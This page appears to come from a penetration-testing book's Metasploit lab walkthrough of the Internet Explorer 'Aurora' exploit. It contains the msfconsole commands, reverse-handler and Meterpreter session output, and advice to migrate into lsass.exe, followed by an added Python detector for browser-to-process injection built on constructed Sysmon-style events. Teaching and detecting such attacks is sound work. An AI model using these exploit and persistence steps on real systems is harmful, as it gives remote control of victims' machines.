Exploitation Using Client-Side Attacks   117

msf exploit(ms10_002_aurora) > set LHOST 192.168.33.129
LHOST => 192.168.33.129
msf exploit(ms10_002_aurora) > set LPORT 443
LPORT => 443
msf exploit(ms10_002_aurora) > exploit -z
[*] Exploit running as background job.
msf exploit(ms10_002_aurora) >
[*] Started reverse handler on 192.168.33.129:443
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.33.129:80/
[*] Server started.

msf exploit(ms10_002_aurora) >


First, notice that the default setting for SRVHOST is 0.0.0.0, which means that the web server will bind to all interfaces. The SRVPORT setting, 8080, is the port to which the targeted user needs to connect for the exploit to trigger. We will be using port 80 instead of 8080, however. We could also set up the server for SSL, but for this example, we'll stick with standard HTTP. URIPATH is the URL path the user will need to request to trigger the vulnerability, and we set this to a slash (/).

With our settings defined, use your Windows XP virtual machine and connect to the attacker using http://<attacker's IP address>. You'll notice the machine becomes a bit sluggish. After a little waiting, you should see a Meterpreter shell. In the background, the heap spray was performed and the jump into the sprayed heap memory was executed, eventually landing in your shellcode. If you open Task Manager in Windows before you run this exploit, you can actually see the memory used by iexplore.exe growing significantly because of the constant growth of the heap.

msf exploit(ms10_002_aurora) >
[*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.33.130
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.33.129:443 -> 192.168.33.130:1161)

msf exploit(ms10_002_aurora) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

You now have a Meterpreter shell, but there's a slight problem. What if the targeted user closes the browser because of the sluggishness of her computer? You would effectively lose your session to the target, and although the exploit was successful, it would be cut off prematurely. Fortunately, there is a way around this: Simply type run migrate as soon as the connection is established, and hope that you make it in time. This Meterpreter script automatically migrates to the memory space of a separate process, usually lsass.exe, to improve the chances of keeping your shell open if the targeted user closes the originally exploited process.
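From the defender's side, the two steps described on this page leave a distinctive trace on the victim: the browser that requested the exploit page opens a connection back to the handler (here 192.168.33.129:443), and the migration then has that same browser process open another process with write and thread-creation rights and start a thread in it. The following detector is an added example, not code from the book or from Metasploit; it runs over a constructed, simplified Sysmon-style event list (event 3 = NetworkConnect, 8 = CreateRemoteThread, 10 = ProcessAccess are real Sysmon IDs, but the dictionary field names, PIDs and the assumption that migration shows up as a classic write-plus-remote-thread sequence are mine) and flags a browser that acquires injection rights on, or creates a thread in, any other process, attaching the browser's prior outbound connections as context.

```python
"""Flag a browser process migrating into another process, Sysmon-style events.

Added, constructed example (not from the book or Metasploit). Event dicts use
simplified field names; the only things taken from real Sysmon are the event IDs
(3 NetworkConnect, 8 CreateRemoteThread, 10 ProcessAccess) and the access mask.
"""
from collections import defaultdict
from dataclasses import dataclass

# Win32 PROCESS_* access-mask bits that together allow writing code into another
# process and starting it; a browser should never need these on lsass.exe.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020

BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe"}


@dataclass(frozen=True)
class Alert:
    rule: str
    source_pid: int
    source_image: str
    target_pid: int
    target_image: str
    context: str


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_migration(events):
    """Return one Alert per suspicious cross-process action by a browser.

    Rule A (browser-injection-handle): a browser opens another process with
        PROCESS_VM_WRITE plus PROCESS_CREATE_THREAD or PROCESS_VM_OPERATION.
    Rule B (browser-remote-thread): a browser creates a thread in another process.
    Each alert lists the browser's earlier outbound connections so the analyst
    sees the handler address next to the migration.
    """
    alerts = []
    outbound = defaultdict(list)  # pid -> ["ip:port", ...], in arrival order
    for ev in events:
        eid = ev["event_id"]
        image = _basename(ev["image"])
        if eid == 3:
            outbound[ev["pid"]].append(f'{ev["dst_ip"]}:{ev["dst_port"]}')
            continue
        if image not in BROWSERS or eid not in (8, 10):
            continue
        if ev["target_pid"] == ev["pid"]:
            continue  # a process opening a handle to itself is routine
        target = _basename(ev["target_image"])
        ctx = "outbound: " + (", ".join(outbound[ev["pid"]]) or "none")
        if eid == 10:
            granted = ev["granted_access"]
            can_write = bool(granted & PROCESS_VM_WRITE)
            can_run = bool(granted & (PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION))
            if can_write and can_run:
                alerts.append(Alert("browser-injection-handle", ev["pid"], image,
                                    ev["target_pid"], target,
                                    f"{ctx}; access=0x{granted:x}"))
        else:  # eid == 8
            alerts.append(Alert("browser-remote-thread", ev["pid"], image,
                                ev["target_pid"], target, ctx))
    return alerts


IE = r"C:\Program Files\Internet Explorer\iexplore.exe"
LSASS = r"C:\WINDOWS\system32\lsass.exe"

# Constructed sample: IE fetches the exploit page (port 80), the stage connects
# back on 443, a benign query-only handle to lsass.exe is ignored, and then the
# write-capable handle plus remote thread that a migration produces are flagged.
SAMPLE_EVENTS = [
    {"event_id": 1, "pid": 1480, "image": IE},
    {"event_id": 3, "pid": 1480, "image": IE, "dst_ip": "192.168.33.129", "dst_port": 80},
    {"event_id": 3, "pid": 1480, "image": IE, "dst_ip": "192.168.33.129", "dst_port": 443},
    {"event_id": 10, "pid": 1480, "image": IE, "target_pid": 668, "target_image": LSASS,
     "granted_access": 0x1000},  # PROCESS_QUERY_LIMITED_INFORMATION only: benign
    {"event_id": 10, "pid": 1480, "image": IE, "target_pid": 668, "target_image": LSASS,
     "granted_access": 0x1F0FFF},  # PROCESS_ALL_ACCESS
    {"event_id": 8, "pid": 1480, "image": IE, "target_pid": 668, "target_image": LSASS},
]

if __name__ == "__main__":
    for a in detect_migration(SAMPLE_EVENTS):
        print(f"[{a.rule}] {a.source_image}({a.source_pid}) -> "
              f"{a.target_image}({a.target_pid}): {a.context}")
```

Tuning note: the query-only handle is deliberately left unflagged because browsers and monitoring agents open such handles constantly; the signal is the combination of a browser as the source, write-and-execute rights on the target, and the handler connection already visible in the same process's history.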